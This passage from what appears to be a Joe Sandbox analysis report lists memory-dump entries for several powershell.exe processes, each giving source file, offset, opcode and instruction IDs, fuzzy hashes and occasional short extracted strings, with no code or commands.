                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27985d7170f739327fd1881321031a7a83fdf888bc4c1b64cd98d139ac23fd9c
                                                                                • Instruction ID: ec8a49d8cece5a5f33231d5475ca53eca79376d75680d2ae68820537995f24c9
                                                                                • Opcode Fuzzy Hash: 27985d7170f739327fd1881321031a7a83fdf888bc4c1b64cd98d139ac23fd9c
                                                                                • Instruction Fuzzy Hash: 3C513D67A0B79E1FE7125B9CA8F64F93B50EF52628B0903F3D0D84B0B3FD4925568681
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35a9e7b8d4fcfa539f11f559bfab4342bc78d0feac74b8cc57aee4afd2f68d03
                                                                                • Instruction ID: c1c03d358e27738a254e6472c512f38d1abc38cafa61283589ceee0f9938a3be
                                                                                • Opcode Fuzzy Hash: 35a9e7b8d4fcfa539f11f559bfab4342bc78d0feac74b8cc57aee4afd2f68d03
                                                                                • Instruction Fuzzy Hash: A5411871A0DB8C9FDB18DF5C984A6B9BBE0FB94710F00426FE459D3292DA70A85587C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: decf7086e7e382ad8bd7d08671f40fd2743b2d164d73facb4198916f9ea42ebb
                                                                                • Instruction ID: 7e477c750e9f3b957ce081dbe5b05dfcec6acff2c09efd364079b39be6d2d15a
                                                                                • Opcode Fuzzy Hash: decf7086e7e382ad8bd7d08671f40fd2743b2d164d73facb4198916f9ea42ebb
                                                                                • Instruction Fuzzy Hash: DE210C3190C74C8FEB59DBAC988A7E97FF0EB96321F04426FD048C3166DA749456CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: a855e341a462274d49eabc0e16f816d0981cb0317f9cc1d8a1f2f3ba92cc05e1
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: EA01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58EC36A1DA32E882CB41
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                                • Instruction ID: c1de2499a4879d287196033eb93758809c7c04b9fe83aac8f2df12c5a1a5a49a
                                                                                • Opcode Fuzzy Hash: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                                • Instruction Fuzzy Hash: C4F09A32B0E9098FD768EB4CE4518A8B3E1EF5932072600BAE06DC71B3CA25EC408780
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                                • Instruction ID: 95fcc9729cec54b0f89309f63a5c0766168dad134372329cc680b0485ebb1abe
                                                                                • Opcode Fuzzy Hash: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                                • Instruction Fuzzy Hash: 98F05E32B0E5498FD764EB5CE4658A8B7E0FF4932475600BAE15DC74A3DA25AC44C790
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: cdab32a5d8804fbfaa35fd86f79cc5e0cbc80fc2a89f23c2f1827656015b2d24
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 52E01A31B0C8088FDA78DB4CE0519A973E2EB9D32171601BBD14EC7571CA22ED518B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^7$M_^8$M_^?$M_^@$M_^F
                                                                                • API String ID: 0-3108979760
                                                                                • Opcode ID: 3ef853b186a24f72beeb0730edc14bcf747cee64d1d5d5914805d88cc51cbb60
                                                                                • Instruction ID: cbac0d32710b5d077d52c89923c29d7f8667db912d442497e752d05bcd676dd5
                                                                                • Opcode Fuzzy Hash: 3ef853b186a24f72beeb0730edc14bcf747cee64d1d5d5914805d88cc51cbb60
                                                                                • Instruction Fuzzy Hash: 6441036B70842A8DD3053A7DB8209FD7751DFA423978903F6E0A9CB0D3BD15708A8AC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^$M_^$M_^$M_^
                                                                                • API String ID: 0-1397233021
                                                                                • Opcode ID: 02e2e0b1ea17c21aa1aa3ff27b1eb9c40fe6ffa8763d49c4f57750e9d385af0c
                                                                                • Instruction ID: 1d914b6971f05cab18780df36f254c6ddff615c21b1588ad91f0bd90ea71a829
                                                                                • Opcode Fuzzy Hash: 02e2e0b1ea17c21aa1aa3ff27b1eb9c40fe6ffa8763d49c4f57750e9d385af0c
                                                                                • Instruction Fuzzy Hash: EE318193B0FBD65BE367066A88B90A47FA0EF52758B0B03F6C0D84B5A3BC5925438241
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U$X7k
                                                                                • API String ID: 0-2576589798
                                                                                • Opcode ID: 49d95ff0ffe6943017c4336de3bd1ec023ffe4856b72b4baee02d3e0183661c9
                                                                                • Instruction ID: 232abede7ffdac69a85fa1a6907f088605250ccced81531d0c62e9d58927cc72
                                                                                • Opcode Fuzzy Hash: 49d95ff0ffe6943017c4336de3bd1ec023ffe4856b72b4baee02d3e0183661c9
                                                                                • Instruction Fuzzy Hash: 0AD16A72B0E68E4FEB699B6C88745B57BD0EF19314B1901FED45DC71E3D918A8058341
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 457a9834b5b4e1040173fe58aea43af4f1963528c0036f97e6c2c0b312c97c50
                                                                                • Instruction ID: 88c1175e3839abef4788e2c68e145ddfc8c44225e14ba58ae3878b9e0b3ec97f
                                                                                • Opcode Fuzzy Hash: 457a9834b5b4e1040173fe58aea43af4f1963528c0036f97e6c2c0b312c97c50
                                                                                • Instruction Fuzzy Hash: 24413B7190DB884FDB18DB5C9C1A6B8BBE0FB59310F04426FD489C3292CA60B915CBC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1896806368.00007FFD9B64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B64D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b64d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1aa70149da7a8cede59bc405483edd49d288d2d32d01640cb8feacb1b76e3f8
                                                                                • Instruction ID: 8d8f6932e3b14f37c3e6b531ae8df1611b6eb20b7e7cf7d6da0e50ae52307644
                                                                                • Opcode Fuzzy Hash: e1aa70149da7a8cede59bc405483edd49d288d2d32d01640cb8feacb1b76e3f8
                                                                                • Instruction Fuzzy Hash: C941163050EBC44FE76A8B289855A623FF1EF56220B1A01DFD0D8CB1A3D625A846C792
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3802d984b7206b62bfe8beb95857bab29306b05b680b6c888c49f84920b24b44
                                                                                • Instruction ID: a3708fef269cbf5d6ab1016489e289156196a848790a56acb8cb91e43ac69757
                                                                                • Opcode Fuzzy Hash: 3802d984b7206b62bfe8beb95857bab29306b05b680b6c888c49f84920b24b44
                                                                                • Instruction Fuzzy Hash: F8212B3190C74C4FDB59DBAC9C4A7E97FE0EB96321F04426BD048C3166DA74A40ACB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: 606a3e1d64f3f184d29538b399a082f5dcd9ff4372c83a7c912515896dbd522b
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 2301677121CB0C8FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB46
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 136a308d330467f8770d40a1de29c747f862a7cd1f0e7302be07a9f2866b59de
                                                                                • Instruction ID: fdb6801caa94a90789e867c6bc4b63866dae9cf7393c9b77c878da2e059b59a0
                                                                                • Opcode Fuzzy Hash: 136a308d330467f8770d40a1de29c747f862a7cd1f0e7302be07a9f2866b59de
                                                                                • Instruction Fuzzy Hash: 9AF02B36A1AB8C4FDB56DF2CD8691E47FA0FF65201B0501BBD548C7171EB205948C7C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                                                • Instruction ID: c12ddadf81d5a28fd2ee6c8f2fb35af0f4db4f04668ffd78b5b796bbdd503c51
                                                                                • Opcode Fuzzy Hash: 626bae229b1ac96fe4b1d457ead44e4f7f0f87adf08fd81874a652e2345d356c
                                                                                • Instruction Fuzzy Hash: B8F0B432B0D9094FDB68EB4CE4518D873E0EF5832071500BAE06DC71B3CA25EC40C740
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                                                • Instruction ID: 85ba145f0950cb8959a313e2771051e1e081e84e099dc0cb251adb9e9632afb7
                                                                                • Opcode Fuzzy Hash: f79d10961b99d142bcddb17df9f177fecb69bcb51716edbddbcf320f68a5da64
                                                                                • Instruction Fuzzy Hash: 9EF0BE32A0E5498FDBA4EB4CE0608A8B7E0FF0832071600BAE05DC71A3DA25EC50C780
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1898062380.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b830000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: 585ec3caf0cf4cdf2a5ccd245456338458df09984bb726fb38306844d3d01381
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 32E01A31B0C8088FDAB8DB4CE0519AD73E1EB9832171601BBD14EC7671CA26ED518B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1897454819.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd9b760000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                • API String ID: 0-2388461625
                                                                                • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                • Instruction ID: 50a0c9028fc9e5b9b9ba953ad775e5eb324d4aa13dc9b7a34a0055a2eab47c01
                                                                                • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                                • Instruction Fuzzy Hash: A521C577A445154EC30537BCBD619EC6B82DB6437834501F3E229CF593DE14648B8A82
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2cc5f0506dd5f8bf2e009ece2aaa35553f542fb1a6d164c3181e89e80ec2a198
                                                                                • Instruction ID: 5b9e8ae094c58dbbd34db1c93395243edf00d7c290c4d26df5821ce8410537ce
                                                                                • Opcode Fuzzy Hash: 2cc5f0506dd5f8bf2e009ece2aaa35553f542fb1a6d164c3181e89e80ec2a198
                                                                                • Instruction Fuzzy Hash: BED17230A19A4D8FDF94DF5CC4A5AAD7BE1FF68301F1542AAD40DD72A6CA34E841CB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 78ea7e431539aaa5db3960eea2438f0d6dfff0ca1051c18bab030548fbc36397
                                                                                • Instruction ID: d0f5473b7b6fa73847db32766338757e49f9deb7e36dd6ad61271514b8918883
                                                                                • Opcode Fuzzy Hash: 78ea7e431539aaa5db3960eea2438f0d6dfff0ca1051c18bab030548fbc36397
                                                                                • Instruction Fuzzy Hash: 1DD16872B0EACE4FEBA5ABA888745B57BE0EF19314B1901FED45DC70E3D918A905C341
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2af7d997e635880ae3a297bf57633e5f15551139487fe18540edc04d6382d3c3
                                                                                • Instruction ID: f941a64aacfa2961a32e17452708f027130b54ea0a2a032fded610488daa5d47
                                                                                • Opcode Fuzzy Hash: 2af7d997e635880ae3a297bf57633e5f15551139487fe18540edc04d6382d3c3
                                                                                • Instruction Fuzzy Hash: 23413B71A0DF884FDB189B5C984A6B87BE1FF95311F40426FE089932A2DA30A915C7C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57fb526cfa4b2d9254724d511b118648dafc991178be07007c70f28fe4ed6157
                                                                                • Instruction ID: 2bfe0aa9a401e604a75a430f2405aa4527b870516ef34c438505314bd4cd01e9
                                                                                • Opcode Fuzzy Hash: 57fb526cfa4b2d9254724d511b118648dafc991178be07007c70f28fe4ed6157
                                                                                • Instruction Fuzzy Hash: 93416037F0BF9A0FE711AA5C9CF64E93B90EF51B56B0902B7D0D8460B3FD1525464682
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2048175237.00007FFD9B66D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B66D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b66d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 71542f236ee339ae3f1c5d1e0cae03035fdba113791604987349a4dfd4650f23
                                                                                • Instruction ID: 148184a966b9e00a9aae6de7d082b36f61e74464d95ffe94e3af3c38b2617a25
                                                                                • Opcode Fuzzy Hash: 71542f236ee339ae3f1c5d1e0cae03035fdba113791604987349a4dfd4650f23
                                                                                • Instruction Fuzzy Hash: AB41287140EBC49FE7568B2D98519523FF0EF56320B1901DFD088CB1A3D625B846C792
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f157e5f38b1ea34307152aebb80ba2dcfb54a77c18e4870f34aa13fabdb0b491
                                                                                • Instruction ID: eb18394ab6a93c983f40cec415bf355752af49f41fe13729cc3f49e704e12583
                                                                                • Opcode Fuzzy Hash: f157e5f38b1ea34307152aebb80ba2dcfb54a77c18e4870f34aa13fabdb0b491
                                                                                • Instruction Fuzzy Hash: C821283090CB4C8FDB59DBAC988A7E97FF0EB96321F04426BD44CC3162DA749416CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction ID: b0756f8a4c7956ffab13a62e7a7c7099be051ef85b7a7f41cfbc275390928040
                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction Fuzzy Hash: DD01677121CB0C4FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB45
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                                • Instruction ID: b0b0a8846fddc1a160361d49569fdefee22e9c3a0f37323819a51afb9de8554d
                                                                                • Opcode Fuzzy Hash: d2537c7df8b8d21297c976f5652b2036572d8a36a17f5878886c3849f21a797d
                                                                                • Instruction Fuzzy Hash: A6F09A32B4E5098FD769EB8CE4518E873E0EF58320B2600FAE06DC71B7CA25EC408740
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                                • Instruction ID: 1011cd16b8842df13856c2af93c7f7d567d8053b22b232fc184a05a81038b045
                                                                                • Opcode Fuzzy Hash: 9c795ca601e37e9e83fd1109dc9506216d0f000ad8760f10953b6ca8e040aa1a
                                                                                • Instruction Fuzzy Hash: 62F0BE32A4E5498FD768EB8CE0608A877E0FF0832072600FAE05DCB0A7DA25BC40C740
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2050082706.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b850000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: 0e77a6cbb02ba194589bce14a9dc6363ce941337e6a6b016bcb11bd49ac142eb
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 89E01A31B4C8088FDB78DB8CE0519A973E1EB98321B5601BBD14EC7575CA22ED518B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                • API String ID: 0-1031638419
                                                                                • Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                • Instruction ID: 9c609324f68ff23724be791fbbf1dce330fb4b8e09d9a9f09f36dffb33c5ab2a
                                                                                • Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                • Instruction Fuzzy Hash: 1321247B7085165ED30677AEB8119EC7381DBE427634991B3E368CB553DF14A08B8AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2049153599.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_7ffd9b780000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L_^$L_^$L_^$L_^
                                                                                • API String ID: 0-2357752022
                                                                                • Opcode ID: 44c4db2fa3de71efa4649a0ca1cc1d65f2b15660ba8b41059d166e8b97c168c4
                                                                                • Instruction ID: 237cbf52692ae0aefbfce1bcb4f93f9c69227edd708745172dec7fc7af4af6f8
                                                                                • Opcode Fuzzy Hash: 44c4db2fa3de71efa4649a0ca1cc1d65f2b15660ba8b41059d166e8b97c168c4
                                                                                • Instruction Fuzzy Hash: D44174A2B0FBC61FF36646698CA90457F60FF52A5870A53F7C0D48B0F3ED29190B8652
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: X7`
                                                                                • API String ID: 0-1347043371
                                                                                • Opcode ID: da034092b266f24d9a0fea789ef1d5a64e32537aa8627cbcc96d7c038aafe8a3
                                                                                • Instruction ID: dbee87347349e3848d195320aa231ea6db307f6aa3bafa5f86a37616ac84518e
                                                                                • Opcode Fuzzy Hash: da034092b266f24d9a0fea789ef1d5a64e32537aa8627cbcc96d7c038aafe8a3
                                                                                • Instruction Fuzzy Hash: 6FD155B2B0EB8E4FEBA5AB6848745B57BE2EF19314B1901FED45CC70E3D918A805C341
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                                • Instruction ID: 502d0898ca71ff8def96d2e3b543c5cae7588d200d8f52a63d7a13232becee29
                                                                                • Opcode Fuzzy Hash: c9253e79730304b162afe365478948707877d8262c03d351a507f9a73086ace2
                                                                                • Instruction Fuzzy Hash: 20D16231A18A4D8FDF94DF5CC4A5AAD7BE1FF68300F1542AAD409D72A9CB74E841CB81
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
